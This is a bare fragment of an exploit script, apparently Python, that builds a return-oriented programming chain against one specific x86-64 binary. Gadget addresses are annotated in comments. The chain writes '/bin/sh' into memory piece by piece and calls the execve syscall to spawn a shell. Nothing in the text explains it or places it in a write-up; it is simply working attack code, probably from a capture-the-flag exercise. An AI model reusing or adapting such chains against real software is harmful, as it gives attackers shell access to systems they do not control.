payload = p64(0x40125d)
#0x000000000040125d: pop rbp; ret; 
payload += p64(0xf1ffffd5)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x45b1a3)+p64(0x0)+p64(0x4360af)
# 0x00000000004360af: add dword ptr [rsi], ebp; ret 0xe; 
payload += p64(0x40125d)+p64(0x0)+"\x00"*6
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x6e69622f)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x45b070)+p64(0x0)+p64(0x4360af)
# 0x00000000004360af: add dword ptr [rsi], ebp; ret 0xe; 
payload += p64(0x40125d)+p64(0x0)+"\x00"*6
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x68662f)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x45b074)+p64(0x0)+p64(0x4360af)
# 0x00000000004360af: add dword ptr [rsi], ebp; ret 0xe; 
payload += p64(0x429f12)+p64(0x0)+"\x00"*6
# 0x0000000000429f12: mov edx, 0xe00002b; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x36b5afb8)+p64(0x4059b8)
# 0x00000000004059b8: xchg eax, edi; ret; 
payload += p64(0x401553)
# 0x0000000000401553: add edx, dword ptr [rax - 0x366ffe15]; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x3b)+p64(0x4059b8)
# 0x00000000004059b8: xchg eax, edi; ret; 
payload += p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x45b070)+p64(0x40b2fb)
# 0x000000000040b2fb: syscall; 
payload += b''
